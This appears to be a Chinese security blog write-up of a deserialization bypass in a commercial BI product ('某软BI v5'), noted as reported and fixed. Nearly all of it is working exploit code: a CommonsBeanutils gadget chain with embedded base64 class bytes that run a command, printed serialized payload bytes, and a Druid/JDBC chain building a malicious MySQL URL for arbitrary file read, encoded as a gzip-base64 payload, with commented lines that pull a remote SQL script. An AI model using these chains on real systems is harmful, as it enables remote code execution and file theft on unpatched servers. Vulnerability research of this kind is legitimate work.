某软BI v5反序列化绕过

admin 2024年9月25日18:33:22评论19 views字数 95321阅读317分44秒阅读模式

漏洞已提交,厂商已修复

cb链

某软存在cb链,先生成cb链的字节数组,

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import org.apache.commons.beanutils.BeanComparator;

import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.PriorityQueue;

public class Main implements Serializable {

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}

//创建恶意类,弹出计算器
public static TemplatesImpl generateTemplates() throws Exception {
byte[] code = Base64.decode("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWn" +
"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABJMn" +
"b3JnL2V4YW1wbGUvQ2FsYzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhn" +
"bi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nln" +
"cmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yn" +
"Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vun" +
"L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7n" +
"AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzn" +
"bHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhn" +
"dG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphn" +
"dGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVyn" +
"bmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUvn" +
"eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4Bn" +
"AAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKQEAClNvdXJjZUZpn" +
"bGUBAAlDYWxjLmphdmEMAAkACgcALgwALwAwAQAEY2FsYwwAMQAyAQATamF2YS9pby9JT0V4Y2Vwn" +
"dGlvbgwAMwAKAQAQb3JnL2V4YW1wbGUvQ2FsYwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pn" +
"bnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjn" +
"aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVun" +
"dGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhn" +
"L2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABwAIn" +
"AAAAAAAEAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAACwANAAAADAABn" +
"AAAABQAOAA8AAAABABAAEQACAAsAAAA/AAAAAwAAAAGxAAAAAgAMAAAABgABAAAAFgANAAAAIAADn" +
"AAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABQAFQACABYAAAAEAAEAFwABABAAGAACAAsAAABJAAAAn" +
"BAAAAAGxAAAAAgAMAAAABgABAAAAGQANAAAAKgAEAAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABkAn" +
"GgACAAAAAQAbABwAAwAWAAAABAABABcACAAdAAoAAQALAAAAYQACAAEAAAASuAACEgO2AARXpwAIn" +
"Syq2AAaxAAEAAAAJAAwABQADAAwAAAAWAAUAAAAOAAkAEQAMAA8ADQAQABEAEgANAAAADAABAA0An" +
"BAAeAB8AAAAgAAAABwACTAcAIQQAAQAiAAAAAgAj");
return newTemplatesWithClassBytes(code);
}

//设置条件,使字节码正常加载,
private static TemplatesImpl newTemplatesWithClassBytes(byte[] classBytes) throws Exception {
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});
// 进入 defineTransletClasses() 方法需要的条件
setFieldValue(templates, "_name", "name" + System.nanoTime());
setFieldValue(templates, "_class", null);
setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
return templates;
}



public static byte[] getPayload() throws Exception {
//这里返回我们设置好的TemplatesImpl实例,
TemplatesImpl obj = generateTemplates();

//compare
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

//将PriorityQueue的comparator设置成BeanComparator类,就可以调用BeanComparator类的compare函数,
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
queue.add("1");
queue.add("1");

//这里将BeanComparator类的property变量设置为outputProperties,
// 目的是让PropertyUtils.getPropert去调用到TemplatesImpl类的getoutputProperties函数,
setFieldValue(comparator, "property", "outputProperties");
//设置queue为2大小的数组,并且值为TemplatesImpl类,
// 目的就是让PropertyUtils.getPropert的第一个参数为TemplatesImpl类,
setFieldValue(queue, "queue", new Object[]{obj, obj});

// 生成序列化字符串
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(queue);
oos.close();

return barr.toByteArray();
}

public static void main(String[] args) throws Exception {
byte[] payload = getPayload();

//输出序列化后的数组,
System.out.println(Arrays.toString(payload));

//反序列化
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload));
//反序列化,就会调用到PriorityQueue类的ReadObject函数,之后调用到BeanComparator类的compare函数,
//再之后调用到TemplateImpl类的getoutputProperties函数,
//最终在defineTransletClasses函数中实现加载字节码,
ois.readObject();


}


}

//输出结果:byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};

jdbc-mysql 任意文件读取(mysql反序列化失败,mysql 5.1.49修复了反序列化)

以下脚本生成base64加密的序列化数据,使服务器反序列化后,再利用mysql组件进行反序列化,

package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;


import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.swing.UIDefaults;

import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;

public class Main {

public static void main(String[] args) throws NullPointerException, NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {

//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();

List<?> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);

//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);

List<?> list_1 = new ArrayList<>(Arrays.asList(list_3));
List<?> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);



UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor<?> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);

//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);

//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);

//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);

//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);

Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);

Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
driverClass.setAccessible(true);
driverClass.set(druidXADataSource, "com.mysql.jdbc.Driver");

Field username = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("username");
username.setAccessible(true);
username.set(druidXADataSource, "root");

Field password = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("password");
password.setAccessible(true);
password.set(druidXADataSource, "root");

//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");

Field jdbcUrl = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
jdbcUrl.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//jdbcUrl.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
//jdbcUrl.set(druidXADataSource, "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");

jdbcUrl.set(druidXADataSource, "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_C3P0_calc");

Hashtable<Object,Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap_1,1);
hashtable.put(textAndMnemonicHashMap_2,1);

putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, jsonArray_1);


//List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
//Field list = JSONArray.class.getDeclaredField("list");
//list.setAccessible(true);
//list.set(jsonArray_1, list_3);

//List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
//jsonArray_2.remove(list_1);
//jsonArray_2.add(list_3);
//list_1.add("uuuu");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(hashtable);

byte[] bytes = byteArrayOutputStream.toByteArray();



// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(bytes);
gzipOutputStream.finish();

// 将输出流转化成字节数组,然后base64加密,通过python解密传入,触发反序列化,
byte[] gzipBytes = baos.toByteArray();
Base64.Encoder encoder = Base64.getEncoder();
String base64 = encoder.encodeToString(gzipBytes);
System.out.println(base64);

// 将GZIP格式的字节数组封装成一个输入流对象,并作为var0参数传入Env函数中
InputStream var0 = new ByteArrayInputStream(gzipBytes);

GZIPInputStream var2 = new GZIPInputStream(var0);
JDKSerializer.CustomObjectInputStream var3 = new JDKSerializer.CustomObjectInputStream(var2);
//Map map = (Map) var3.readObject();

}
}

//运行结果:H4sIAAAAAAAAAKUZW2wcV/WuYyeO7fgVx47zagqJaUm768R5NZZJNmu72e0mdr1OAw6ouTtzvTvx7NzxnTvxbkAo/SgP8VEkilSEEKjio0ArfpAoQghQPkB8IEDqDz9UgIQoKhIICQmQyjn3zuzMPuw47Vhe7z3ve86555w7fv1d0uUJsvc2vUOTvrTs5BXqlSUt2mzvjweOP5r785s7SMc86bE5NeepIbnIkt2yLJhX5rZZdS9eIvh0b3TDZy/8doC4J1FcNeltWE4peT07y1apb0vv2DKryrRjXnVYhTuWgaquUvcn/3h36Y3//mqkg5CqIEONpgC+a9fvf35/9NZvt2VInzJkEH4TYMg+g1eSqyJ52+NOMldYuJYWgtaW/vX31w588esLHSSRJ5225UlJBvOoN4V6U3mATFfdRr8oTsRUX/jd4a/9gn5jB0lkSadn3WVVF9VtdCql6+SzpDu2FuR0YIQsW8JMUtsq0iJNmsK3zKTLuZ2s0uQsrj6enqWSFrgvDEb0k1A27i6f0luuSTKsDbWpU0otFG8zA0wVJPUgHUpBO/EnsqQXZFt3WIb7jsySHr1aZHQtR/qjxbJVYTnSY9jc06Q5MqAWiLhq2eDHFbJTQcwc6TO444BxgdABQzAq2TL11gLePtPyDCpMtQRG5mDSrZDda4y5aRuUZsne+vdMmRlrAemwzUuz1uoqE8yRy5AB1FwhA5Uio84SK0GEAAEW7HW4nKu4slawSg61A7VDIfQGtWQ72DXqcC9LxuIwrSTYymgrBt2TJX3oaMj4gK43WGpHDsRW2pN9ghk1ww59OSLgUNxh6SJ1TO6w0C8DkOBMFiSVc4GDxnyPPW3zIrWjcCI+T4YCn88JwYXil+SxWF4D2vAFei1FJa9YRiqt/uS5U5q+SXoDdos7niTnb+Yhp1KrIqVyKhXkVErlVAp3k1I5lakzXYFzyMR0nozqYEcY7SVJrmxPZLSvY5m2kkBHv9mweUlObyXbA5JUziwajS4DOWMm86TgtVZjsw9t7Gx7UeiRQEvBKDPTt5mY96UvmCQT7cMT0pmaDiT0BhLwBEky835tQ3YI9SC7Y+HZrMcbq9ZAnuyxHEvOVQ3mIlSSMW2et26nCs/m6wj0P1KCD421ZUEN1liXClJAqqPVSMXMPJVGWZLj7TerMnWWbziKTHNBwByDPcNqaNjoTTISVYIWo/uhHmA0vTBylx7aO/kGCWDCPpcJi5uzTDYmxdMPLXqxnSDQMBQc/+iw4nb686RHnfgIAtX93Laqe7oIIYZ63a7Kl1fIh6lhMM9b5tcdOKZ2TVWq0Jdp2+YbDOroAerVHCOji3yIDUvP/iIYv5ZehQqbNtZ9S7B5atmQoFCUYStUzFs24DxNnyWHooqitrnEpKilpWRQPj1oLkFTgHLoudRZIUOmnhTSvuQZXqlYEmG+q8yBGIV2dK+C2nnqQdnssMDoYUwzXROfo8KijoRW1IfAaLlTp2JW56RF7QJ0bhBleQvgNBsK8rgNEnXBUdZGfQ2aCeKaoKACMq9esGEcqdBqWvXLLBmG75nmnncAgHN48pR7TDvWOrNkFyARliXj8G3BZc6iYC6FXoapySpwVIDqccAtQshbcJBnUcBwbzklEZuUtqapkaE1lrOFNZajrdkP/W7et23Ecl+qGNZboV9ZhsLigXIlCVQv+U6ODLrlWkAf+mrUbWc1aOpb95kIqVXDa+iDOXKoCdIkeMwrg8hWyRAeCbYtOJc5xG2jvoQN+AKSbQ8ub5QtvfccOSxB7mUmNxhzMrFGGqZAHB/brBfix2P4sJ6E3hyDg+l4VPE8G9suBCGGWQ6n2XBrIz6mvQG5CgcXw4qbA1cCWCdttuLalgGDDIWGAfG4A7UBGmOTljwZCSe8MEFAKrSRj7YvyDYgvdQS7A